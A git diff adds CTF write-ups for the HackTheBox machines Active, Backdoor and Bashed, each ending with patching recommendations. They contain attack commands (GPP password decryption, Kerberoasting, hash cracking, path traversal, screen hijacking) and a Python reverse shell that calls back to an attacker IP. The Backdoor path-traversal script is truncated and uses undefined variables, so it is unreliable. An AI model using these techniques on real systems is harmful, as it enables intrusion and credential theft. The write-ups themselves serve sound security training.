diff --git a/content/writeup-ctf/writeup-active-htb/img/image-9.png b/content/writeup-ctf/writeup-active-htb/img/image-9.png new file mode 100644 index 0000000..158c342 --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7a8ff2e45eb7766f1c37dc1b1b1469103eb5b8be013385da3eb045378cb8f4fb +size 33009 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-9.webp b/content/writeup-ctf/writeup-active-htb/img/image-9.webp new file mode 100644 index 0000000..6d6f6a0 --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5919baac954e989ea7a57796a29afb21446fae2b1bfd703bb2496a05429d1f4a +size 32212 diff --git a/content/writeup-ctf/writeup-active-htb/index.md b/content/writeup-ctf/writeup-active-htb/index.md new file mode 100644 index 0000000..2cb90c4 --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/index.md 
@@ -0,0 +1,125 @@ +--- +title: "Writeup - Active (HTB)" +date: 2022-03-25 +slug: "writeup-active-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Active](https://app.hackthebox.com/machines/Active) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.10.100 +``` +Many TCP ports are discovered: + +![](img/image-1.webp) + +## Exploit + +First of all, let's make an enumeration of the users/shares with the following command: + + +```bash +enum4linux -a 10.10.10.100 +``` +![](img/image-2.webp) + +You can find a certain amount of information, but above all, a share is available for reading as an anonymous person. Let's see what we can find inside. To connect I use the following command: + + +```bash +smbclient --no-pass //10.10.10.100/Replication +``` +In the share there are two folders, one of which is of particular interest to me: `Policies`. In this folder I find the file `Groups.xml` which contains information allowing the exploitation of the machine. + +[Exploiting GPP SYSVOL (Groups.xml) | VK9 Security](https://vk9-sec.com/exploiting-gpp-sysvol-groups-xml/) + +![](img/image-3.webp) + +And indeed in the file I find 2 important information: `name` and `cpassword`. + + +```bash + + + +``` +As explained in the article above it is possible to decrypt the `cpassword` with the `gpp-decrypt` command. + +![](img/image-4.webp) + +We can therefore deduce the following credencials: + +user : active.htb\SVC\_TGS +pass : GPPstillStandingStrong2k18 + +I now look at the permissions I have with these credentials: + +![](img/image-5.webp) + +I now have access to the share `Users`, let's see what's inside: + +![](img/image-6.webp) + +I quickly find the first flag on the desktop of the SVC-TGS user: + +![](img/image-7.webp) + +## Privilege escalation + +To realize the elevation of privilege and since I have the credential of a user, I will do a Kerberoasting. 
+ + +> Kerberoasting is a post-exploitation attack that extracts service account credential hashes from Active Directory for offline cracking. [complx.com](https://www.qomplx.com/qomplx-knowledge-kerberoasting-attacks-explained/#:~:text=Kerberoasting%20is%20a%20post%2Dexploitation,poor%20service%20account%20password%20hygiene.) + +To perform the hashes extraction I will use the following command: + + +```bash +impacket-GetUserSPNs active.htb/SVC_TGS -dc-ip 10.10.10.100 -outputfile output.txt -request +``` +![](img/image-8.webp) + + +```bash +┌──(d3vyce㉿kali)-[~] +└─$ cat output.txt +$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$b8d16f6a494a6a06a7954e6a89f01ae1$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 +``` +Bingo, the command finds the hash of the administrator of the machine, now we can perform a dictionary attack locally using john. To do this I use the following command: + + +```bash +john output.txt --wordlist=Documents/wordlist/rockyou.txt +``` +![](img/image-9.webp) + +After a few seconds, John gives me the password for the administrator account: `Ticketmaster1968`. + +I can verify that the credentials work well with `smbmap` : + +![](img/image-10.webp) + +Then I can create a reverse shell with `psexec`: + +![](img/image-11.webp) + +I now have a shell as `NT authority` authority and I can get the last flag. + + +```bash +C:\Users\Administrator\Desktop> more root.txt +7255a7f4f435814c28a5e8b51aabb4b4 +``` +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not leave the `Policies` file accessible to everyone +- Disable SMB anonymous access +- Use a strong password for the administrator account diff --git a/content/writeup-ctf/writeup-backdoor-htb/featured.png b/content/writeup-ctf/writeup-backdoor-htb/featured.png new file mode 100644 index 0000000..38f3539 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/featured.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9483ec3250f81cd7446feb84946ad4ffd3371bdc18f53912e93d4a61ed94d44f +size 272821 diff --git a/content/writeup-ctf/writeup-backdoor-htb/featured.webp b/content/writeup-ctf/writeup-backdoor-htb/featured.webp new file mode 100644 index 0000000..c6d2af1 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:30a7d8ba038a5f5bb70fa58841e7726ae34ee8c9aa8357ba0d5615dc842d4ea8 +size 28208 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-1.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-1.png new file mode 100644 index 0000000..49ce4d3 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6c5aa8af5883edee76b64d05ba2cfcca4da106ea380ce1f6d2308d07902a367a +size 56775 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-1.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-1.webp new file mode 100644 index 0000000..d0f03d7 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:85f74302b41a28bcf7e402d095f54e2c9fd7183baf22ac274467feb6be4d7c7c +size 48384 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-10.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-10.png new file mode 100644 index 0000000..85aa185 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5d43e9faeca3ccfb3a91dc50dfe6bc121c2fe96d0675c34bb4b853446153f7ad +size 9895 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-10.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-10.webp new file mode 100644 index 0000000..1960dcb --- /dev/null 
+++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6b2ddd8cb93b8ddb36fd008a604c028e5bb759727201864e5b83f1b66df653d4 +size 9900 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-2.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-2.png new file mode 100644 index 0000000..49af0c1 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:07134837cc71acedc53c90b683b51b33176ebc85f0bc86ef7d38a5cc762cb623 +size 2036061 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-2.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-2.webp new file mode 100644 index 0000000..474f32c --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3ad0aad85154cb60547830e8d24e280ad77d7dd624c7dda828af0cc29b22fcc3 +size 152582 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-3.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-3.png new file mode 100644 index 0000000..e97971c --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d45350c57229a71c041f40e3a0a21832661822851220dbdda3632fde906c8c73 +size 146806 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-3.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-3.webp new file mode 100644 index 0000000..a80a1d4 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:717b6822852b51a184b64cbb1c7a67bbe8a61e6e4503421ca54ce5189937b0e5 +size 150728 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-4.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-4.png new file mode 100644 index 0000000..e7957cb 
--- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ddff5fa5f65ccd4404856850f96e759f49fd5012e2c32ad1d06594260427fd9d +size 86402 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-4.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-4.webp new file mode 100644 index 0000000..cc960d4 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f53bba5f10f440209eee17cf1ee4e79d975f1123fbbb36af957ebc5035e1e36d +size 80172 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-5.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-5.png new file mode 100644 index 0000000..4223052 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7f3f9ed46a6989ff6e93c5795e090f24bde5e8427c3c8424de1f0da3c3cfe51 +size 30137 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-5.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-5.webp new file mode 100644 index 0000000..0d542bd --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:262a1468e81157c2352d3bd33be91295f11b0e1d359f89c699b2787cf3effe6b +size 37318 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-6.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-6.png new file mode 100644 index 0000000..dfd9cbd --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1171d8f76c5b913ce1cdeb8c11a835d44aa6608832f4e192dd1cf327b48c236d +size 104224 
diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-6.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-6.webp new file mode 100644 index 0000000..10b1ebc --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c59d8bfcbb7cb9d907d005c1a33194bcde4472f9113cc127b232b15f3d09575e +size 79692 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-7.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-7.png new file mode 100644 index 0000000..a07d9a9 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c509f4303696d0da7ce6c16762b9197aabdbf54b2c14b6c361ff2d6dedf4c711 +size 30680 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-7.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-7.webp new file mode 100644 index 0000000..e2b5720 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4bf7d1bb84a822afb796215fb1409b3215a055b2515d65e83a8ea3f9211928be +size 24924 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-8.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-8.png new file mode 100644 index 0000000..9e2bd6a --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0de7b3f0e58bf9b90c07313c52a9047cdb227fdffc1f7f8ec998fd0bcc99c1ea +size 48003 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-8.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-8.webp new file mode 100644 index 0000000..3f1386f --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-8.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:83c50c838c20c98a7f4acb45f3fc7390008376bcdbe4c9a9a27baed7c4649de4 +size 36036 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-9.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-9.png new file mode 100644 index 0000000..4a53918 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:649d76ec676c949ee8137ec7a4e0ac6aa15f9b21520552854c91b51e0b8c0453 +size 33156 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-9.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-9.webp new file mode 100644 index 0000000..f046d16 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:927ea2b85bb1fce53605558c06b992f7bdcef7ce1adfb86e7ffb484e9039a3a8 +size 31010 diff --git a/content/writeup-ctf/writeup-backdoor-htb/index.md b/content/writeup-ctf/writeup-backdoor-htb/index.md new file mode 100644 index 0000000..87f13be --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/index.md 
@@ -0,0 +1,128 @@ +--- +title: "Writeup - Backdoor (HTB)" +date: 2022-04-19 +slug: "writeup-backdoor-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Backdoor](https://app.hackthebox.com/machines/Backdoor) machine from the HackTheBox site. + +# Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV 10.10.11.125 +``` +Three TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2p1) +- 80/tcp : web server (Apache 2.4.41) +- 1337/tcp : ????? + +We have a site on port 80 and port 1337 that hosts an unknown service at the moment; let's see what the site looks like. + +![](img/image-2.webp) + +# Exploit + +After inspecting the page, I notice that it is a site based on the CMS Wordpress, let's do a scan with "WPScan" to try to identify flaws: + +![](img/image-3.webp) + +Nothing special, let's try to do an aggressive detection of the plugins. For this I use the following command: + + +```bash +wpscan --url http://backdoor.htb --plugin-detection aggressive +``` +![](img/image-4.webp) + +There are two plugins: akismet and ebook-download. After some research I find that ebook-download in version 1.1 is exploitable (CVE-. + +So we create a script to automate the process scan, if the page returns a message with a size greater than 82 bytes, then the process exists. + + +```bash +import requests + +for i in range(0,1000): + url = "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc> + answer=requests.get(url) + lg=len(answer.text) + if(leng>82): + if '1337' in resp.text: + print("%d %s ",lg, answer.text) +``` +After running the script, we find 2 services: + +![](img/image-5.webp) + +These processes are gdbserver running on our mystery port: 1337. So we can now look for exploits related to this process. 
+ +Je trouve rapidement le script suivant qui permet d'exécuter du code à distance via le service GDB : + +[GNU gdbserver 9.2 - Remote Command Execution (RCE)](https://www.exploit-db.com/exploits/50539) + +After generating a payload with msfvenom, I run the script : + +![](img/image-6.webp) + +I now have a shell on the remote machine, I can get the first flag. + +![](img/image-7.webp) + +# Privilege escalation + +First I try to find the SUID files. For that I use the following command: + + +```bash +find / -perm -u=s -type f 2>/dev/null +``` +![](img/image-8.webp) + +There are a lot of usual commands. But among the list there is "screen".  It is a command that allows to manage several terminals at the same time. I look then if a process runs with this command: + +![](img/image-9.webp) + +And indeed there is a process running. But not just any process, a root shell with the options -dmS : + +- -d : detache de screen when started +- -m : ignore the $STY environment variable, creation of a new session is enforced +- -S : When creating a new session, this option can be used to specify a meaningful name + +So we know that a screen named root has been created with the user root. If we manage to connect to the screen, we will have access to a root shell. + +To connect to the detached screen we need to use the following command: + + +```bash +screen -x [name]/[user] +``` +But before connecting we will have to define the variable $TERM, to do this I use the following command: + + +```bash +export TERM=screen +``` +I can now connect to the root screen with the following command: + + +```bash +screen -x root/root +``` +I now have access to a root shell and can retrieve the last flag. + +![](img/image-10.webp) + +# Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Update Wordpress plugin +- Update GDB server +- Do not run screen as root with the -m variable 
diff --git a/content/writeup-ctf/writeup-bashed-htb/featured.png b/content/writeup-ctf/writeup-bashed-htb/featured.png new file mode 100644 index 0000000..c376fff --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c885dac12265794e61597ad5cccdc71290e72c4411a869cd0bae02c592daaa26 +size 209998 diff --git a/content/writeup-ctf/writeup-bashed-htb/featured.webp b/content/writeup-ctf/writeup-bashed-htb/featured.webp new file mode 100644 index 0000000..e0dfd56 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:40ee22924a04bc9256a7ddb973cabbdc73b93a4140b63b8f61283e998f7a8140 +size 24012 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-1.png b/content/writeup-ctf/writeup-bashed-htb/img/image-1.png new file mode 100644 index 0000000..4074bcb --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a7e4299b3286c7d1023c4ebec9529523d09b95bfe15daa14008df708a221ec10 +size 29417 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-1.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-1.webp new file mode 100644 index 0000000..0e8c342 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:679e2efd5944711888b8b836115234b3eef08d2a9ba3a715d7d67ad988e639a7 +size 25806 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-10.png b/content/writeup-ctf/writeup-bashed-htb/img/image-10.png new file mode 100644 index 0000000..7a4da76 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:df8ea553145fed1014c2c5cbb69d2044f16a427186865e1a83313ec4aa690c88 +size 17704 
diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-10.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-10.webp new file mode 100644 index 0000000..718367a --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a24d54e59816131e08eafc8baf0a96f699c674315b8698c62dcc55c7fb8b1c72 +size 18092 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-2.png b/content/writeup-ctf/writeup-bashed-htb/img/image-2.png new file mode 100644 index 0000000..223a299 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9b614006e6eee8a20d667654b0e8fe086258f5b1d5595a4bfc4167408146a3ff +size 546813 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-2.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-2.webp new file mode 100644 index 0000000..1147b1c --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:02fc7f9f55a308748a7dd0923385654cc2fa86ad7bd5927b778e1317924b7ee2 +size 114226 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-3.png b/content/writeup-ctf/writeup-bashed-htb/img/image-3.png new file mode 100644 index 0000000..1bfc513 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:14c12ee813d91a0250ab07cefeeb479251ace83a46b6dbf3b940349af7084e24 +size 75656 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-3.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-3.webp new file mode 100644 index 0000000..7815f6d --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:72ed25b5f9bd29bf17a61f5bfc5e1a53d11594adb8af0776d7682ccaf6bc53b8 +size 66764 
diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-4.png b/content/writeup-ctf/writeup-bashed-htb/img/image-4.png new file mode 100644 index 0000000..1714b8c --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b53a592973802bbeed1f44489f0fbba7d9a851677ebab56475f88633efc2f950 +size 21623 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-4.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-4.webp new file mode 100644 index 0000000..950bf6a --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8794cb6ecaac097ef1ab3a09e0b5916972f9b3d5d704d26dd0f4a1835aed71a9 +size 18556 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-5.png b/content/writeup-ctf/writeup-bashed-htb/img/image-5.png new file mode 100644 index 0000000..f720541 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:38c14c80e5c3eac15a6c516dcb8b95fe4e08ed9834538fbe336cea80993a2ad7 +size 32711 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-5.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-5.webp new file mode 100644 index 0000000..b9e2101 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:67fa9e1d0cf8d1c4577fd1dd41655075c0cc5cbd8b05d821c3a43d8d90644e47 +size 28388 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-6.png b/content/writeup-ctf/writeup-bashed-htb/img/image-6.png new file mode 100644 index 0000000..ad6b159 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:79c02e08c4ecd571b5137f4d3cdbfe68a746128c26eb1ad63c64f16113601fc4 +size 39356 
diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-6.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-6.webp new file mode 100644 index 0000000..2bd96d1 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fd9784c9d7b0e811ccf8436b32ef4cb93b5d1c93fec1cec96265913f142e5fb3 +size 31284 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-7.png b/content/writeup-ctf/writeup-bashed-htb/img/image-7.png new file mode 100644 index 0000000..ffdd7a7 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bfff9e8731e784217e86c5b269c82bc2254ca034e62c37fd5388e7f60f776e45 +size 33947 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-7.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-7.webp new file mode 100644 index 0000000..e1d3453 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c5d4856b5e81537e201c5bd291bde90c72d3e32b90a864b90818c67c9415df18 +size 27980 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-8.png b/content/writeup-ctf/writeup-bashed-htb/img/image-8.png new file mode 100644 index 0000000..8c3085a --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:88735f9e0a7e9c79da63c8187f08e21077e8bad50a6b52a5d0537cb7f6b0037e +size 17536 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-8.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-8.webp new file mode 100644 index 0000000..651fcf0 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2ca27b09f87fc7716808496b8d8448651df8ed9b6caba17d2b900860c31d7fd2 +size 16878 
diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-9.png b/content/writeup-ctf/writeup-bashed-htb/img/image-9.png new file mode 100644 index 0000000..37842a6 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3316643536bd23c6afa9046aa8bb746cbd77d8d5946aa84b3ced089c1fa16aee +size 12076 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-9.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-9.webp new file mode 100644 index 0000000..0030007 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:29d580ddc6c7eb025258b9e913bb315e155fb631a8879fbd35eaf8cc42cb2dae +size 19572 diff --git a/content/writeup-ctf/writeup-bashed-htb/index.md b/content/writeup-ctf/writeup-bashed-htb/index.md new file mode 100644 index 0000000..75050b1 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/index.md 
@@ -0,0 +1,88 @@ +--- +title: "Writeup - Bashed (HTB)" +date: 2022-05-03 +slug: "writeup-bashed-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Bashed](https://app.hackthebox.com/machines/Bashed) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.10.68 +``` +One TCP port are discovered: + +![](img/image-1.webp) + +- 80/tcp : HTTP web server (Apache 2.4.18) + +![](img/image-2.webp) + +## Exploit + +First, I start by scanning the site's folders. + +![](img/image-3.webp) + +Quite a few things and in particular the `/dev` folder which contains the 2 following files: + +![](img/image-4.webp) + +After some research they correspond to the following project: [phpbash](https://github.com/Arrexel/phpbash). Globally it is a cmd directly integrated in a web page. So I go to the page and start to look if there are interesting things: + +![](img/image-5.webp) + +Rather fast, we can already get the first flag! + +## Privilege escalation + +Although functional, the cmd in the browser remains limited. So I upload a PHP reverse shell in the `html/uploads` folder. + +![](img/image-6.webp) + +I now have a reverse and I can check the sudo permissions of my user. + +![](img/image-7.webp) + +![](img/image-8.webp) + +So he has the authorization to execute any command as `scriptmanager`. So I search for files/scripts on the machine and find the `/scripts`. I check the permissions with the following command: + +![](img/image-9.webp) + +Looking at the content of the script I realize that there is an automatic execution of the script by the root user. Indeed the file `test.txt` belongs to root and was created a short time ago. 
+ + +```bash +f = open("test.txt", "w") +f.write("testing 123!") +f.close +``` +So I modify the script with the following program: + + +```bash +import socket,subprocess,os +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +s.connect(("10.10.14.4",1234)) +os.dup2(s.fileno(),0) +os.dup2(s.fileno(),1) +os.dup2(s.fileno(),2) +t=subprocess.call(["/bin/sh","-i"]) +``` +After a few minutes, I have a reverse shell root and I can recover the last flag. + +![](img/image-10.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not run phpbash.php directly on the machine, use containers to isolate it for example +- Reduce the permissions of the user hosting the applications to a strict minimum +- Do not run a script automatically as root if it can be modified by other users diff --git a/content/writeup-ctf/writeup-biteme-thm/featured.png b/content/writeup-ctf/writeup-biteme-thm/featured.png new file mode 100644 index 0000000..0d3827d --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bcee2c64acb51cce96eb84f73a43b6a69067deda7bcf099d874f23f5b31a4ad9 +size 397543 diff --git a/content/writeup-ctf/writeup-biteme-thm/featured.webp b/content/writeup-ctf/writeup-biteme-thm/featured.webp new file mode 100644 index 0000000..1b00b88 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:13d3bf4013cca3e7267d9506291331232d9432bfc552b4ed0588e4d4e0032f40 +size 321768 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-1.png b/content/writeup-ctf/writeup-biteme-thm/img/image-1.png new file mode 100644 index 0000000..a2fe741 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-1.png 
